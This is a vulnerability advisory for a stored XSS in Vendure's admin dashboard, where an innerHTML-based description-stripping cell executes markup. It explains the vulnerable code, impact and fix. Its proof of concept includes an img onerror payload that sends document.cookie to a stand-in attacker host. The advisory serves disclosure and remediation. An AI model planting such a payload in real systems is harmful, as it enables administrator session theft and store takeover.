CVE-2026-63459: Vendure: Stored XSS in the Admin Dashboard via unsafe HTML-stripping (innerHTML) of entity descriptions
Stored XSS in the Admin Dashboard via unsafe HTML-stripping (innerHTML) of entity descriptions
Package: @vendure/dashboard (vendure-ecommerce/vendure, latest master) ·
Summary The dashboard's RichTextDescriptionCell "strips HTML" from an entity's description by assigning it to a live element's innerHTML and reading back textContent. This pattern still executes active markup: a description containing <img src=x onerror=…> runs script when the element is parsed (image resource loads even on a detached node in Chromium/Firefox, firing onerror). Because description is an admin-settable field shown in multiple list views, a lower-privilege administrator can store a payload that executes in a higher-privilege administrator's browser when they open the corresponding list — stored XSS leading to admin-session compromise.
Vulnerable code packages/dashboard/src/lib/components/shared/table-cell/order-table-cell-components.tsx tsx export const RichTextDescriptionCell: DataTableCellComponent<{ description: string }> = ({ cell }) => { const value = cell.getValue(); const textContent = useMemo(() => { if (!value) return ''; const div = document.createElement('div'); div.innerHTML = value; // line 51 — parses/loads active markup; <img onerror> fires here return div.textContent ?? ''; // line 52 — reading textContent does NOT undo the side effect }, [value]); ... } innerHTML does not run <script>, but it does trigger resource loads / event handlers such as <img src=x onerror=...>, <image>, <svg> handlers — even on a detached element — so the assignment itself is the sink. Reading textContent afterwards is irrelevant; the handler has already executed.
Reachable from (all use this cell for the description column) - products/products.tsx:53, collections/collections.tsx, promotions/promotions.tsx:62, payment-methods/payment-methods.tsx:57, shipping-methods/shipping-methods.tsx:39.
All of these are description fields editable by administrators with the corresponding catalog/promotion/settings write permissions — which, in Vendure's multi-channel model, includes channel-scoped admins.
Proof of concept 1. As an administrator with UpdateCatalog/UpdateProduct (e.g. a channel-scoped admin), set a Product's description to: <img src=x onerror="fetch('https://attacker.example/'+encodeURIComponent(document.cookie))"> 2. Any administrator who opens the Products list in the dashboard renders RichTextDescriptionCell for that row → div.innerHTML = description → the onerror executes in their session. 3. Payload runs with the viewing admin's privileges (e.g. a superadmin) → session/token exfiltration or admin actions → cross-privilege / cross-channel admin takeover (chains directly with the channel-scoping IDOR class already reported).
Impact Stored XSS executing in administrators' browsers, escalating a low-privilege (e.g. single-channel) admin to actions as any admin who views the affected list. Account/store takeover.
Suggested fix Strip HTML with an inert parser (no script/resource execution) instead of a live element, or sanitize before display: ts // inert: DOMParser documents do not execute scripts or load resources const textContent = new DOMParser().parseFromString(value ?? '', 'text/html').body.textContent ?? ''; (Or render with a vetted sanitizer such as DOMPurify if rich text must be shown.) Audit the codebase for other element.innerHTML = <untrusted> assignments used for "stripping".
Other sources
Vendure is an open-source headless commerce platform. Prior to 3.6.5, RichTextDescriptionCell in packages/dashboard/src/lib/components/shared/table-cell/order-table-cell-components.tsx attempts to strip markup by assigning an administrator-controlled description to a live element's innerHTML and then reading textContent. Active resource markup can execute an event handler during the innerHTML assignment before textContent is read. A lower-privilege administrator can store such markup in descriptions rendered by the Products list, Collections list, Promotions list, Payment Methods list, or Shipping Methods list, and script executes when another administrator views the affected row. This stored cross-site scripting can compromise the viewing administrator's session and enable cross-privilege or cross-channel administrative actions. This issue is fixed in version 3.6.5.
— MITRE
Affected Software
Remediation
Recommended actions to resolve this vulnerability, in priority order.
- Upgrade
Upgrade
npm/@vendure/dashboardto a version that resolves this vulnerability.Fixed in 3.6.5 - Upgrade
Upgrade
@vendure/dashboard (vendure-ecommerce/vendure)to a version that resolves this vulnerability.Fixed in 3.6.5 - Configuration
Replace RichTextDescriptionCell's unsafe pattern that sets an administrator-controlled description into a live element via `div.innerHTML = value` and then reads `div.textContent` (which still triggers resource loads/event handlers like `<img onerror=...>`). Use an inert HTML parsing approach (e.g., DOMParser inert parsing) or sanitize the description before rendering.
Vendure dashboard RichTextDescriptionCell HTML stripping implementation = Use an inert DOMParser approach (no live element innerHTML parsing) or sanitize before display instead of assigning untrusted content to a live element's innerHTML
Event History
Frequently Asked Questions
Who can introduce a malicious payload?
A lower-privilege administrator who can set an entity description can store a payload in that field.
Which users are at risk of executing the payload?
Higher-privilege administrators are at risk when they open a dashboard list view that displays the affected entity description. Successful exploitation can compromise the administrator's session.
Does the payload require a victim to interact with it?
The described payload executes when the description is parsed while rendering the list view; no separate click or interaction is described. The advisory specifically notes image-loading behavior in Chromium and Firefox can trigger an onerror handler even when parsing occurs on a detached element.